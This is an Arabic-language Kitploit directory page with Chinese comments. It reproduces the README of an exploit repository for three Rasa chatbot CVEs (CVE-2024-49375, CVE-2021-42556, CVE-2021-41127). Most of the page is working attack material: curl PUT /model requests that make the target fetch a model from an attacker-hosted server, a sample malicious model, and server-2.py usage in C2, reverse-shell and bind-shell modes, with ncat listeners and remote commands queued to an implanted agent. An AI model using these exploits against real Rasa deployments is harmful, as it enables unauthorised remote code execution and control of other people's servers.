Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
أدوات/GitHubGitHub/lierbushiwo/rasa-cve-exp
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

يمكنك تشغيله مباشرة

root@kitploit:~
python server-1.py

image-20260604134536291

رفع ملفات بشكل تعسفي

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

التأثير كما يلي:

image-20260604135232815

CVE-2021-41127

  • server-1.py

اسم النموذج الافتراضي evil_import_model.tar.gz

نموذج خبيث تجريبي

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet

تحديد قواعد حوار خبيثة

قم بإدخال greet وسيُرجع PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

التأثير كما يلي

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

يقوم model.py بتعديل بيانات محددة داخل الحزمة المضغوطة

عند تشغيله مباشرة، يقرأ افتراضيًا نماذج مجلد /model ويحفظ التعديلات في evil_import_model.tar.gz في الدليل الحالي

image-20260604143558105

تحديد IP الارتداد

اسم النموذج الافتراضي evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

أرسل البيانات بالتتابع فقط

طرق استغلال أخرى (exp)

تختلف في السيناريوهات الفعلية

  • server-2.py

ثلاثة أوضاع


وضع C2 (استطلاع HTTP، موصى به)

root@kitploit:~
攻击机                     Rasa容器(target)
  │                            │
  ├─ 启动 server-2.py ─────────┤
  ├─ PUT /model ──→ 下载 pwnmod.py 到 /app/
  ├─ PUT /model ──→ 下载恶意模型 → import pwnmod → agent 启动
  │                            │
  │  ← GET /poll?agent=xxx ───┤  每 3s 轮询
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  拿到命令
  │  ← POST /result ──────────┤  回传结果
  ├─ /last?agent=xxx ──→ 读结果
root@kitploit:~
# 攻击机启动
python server-2.py --mode c2 --c2-base-url http://<攻击机IP>:8000 --port 8000

# 触发 exploit(两步)
curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/write-module"}}'

curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/model"}}'

# 下发命令
curl "http://<攻击机IP>:8000/enqueue?cmd=id"

# 等 8 秒后读结果(agent 每 3s 轮询 + 执行时间)
curl "http://<攻击机IP>:8000/last?agent=<hostname>"

# 不指定 agent 也行(走通配符)
curl "http://<攻击机IP>:8000/enqueue?cmd=whoami"
curl "http://<攻击机IP>:8000/last"

وضع Reverse (Shell عكسي)

root@kitploit:~
# 1) 攻击机启动监听
ncat -lvnp 4444

# 2) 攻击机启动 server-2.py
python server-2.py --mode reverse --reverse-host <攻击机IP> --reverse-port 4444 --port 8000

# 3) 触发 exploit
curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/write-module"}}'

curl -X PUT http://<rasa地址>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<攻击机IP>:8000/model"}}'

# 4) nc 收到 $ 提示符,直接交互

وضع Bind (Shell مباشر، غير شائع)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# agent 在目标容器内监听 0.0.0.0:4444
# ncat <目标IP> 4444 即可连接

شرح المنافذ/العناوين

参数含义
تنزيل الأداة
--port 8000منفذ الاستماع الخاص بـ server-2.py
--c2-base-urlعنوان base URL الكامل الذي يستعلم منه الوكيل (agent) في وضع C2 (يجب أن يكون عنوانًا يمكن للحاوية الوصول إليه)
--reverse-hostعنوان IP الهدف لـ Shell العكسي
--reverse-portمنفذ الهدف لـ Shell العكسي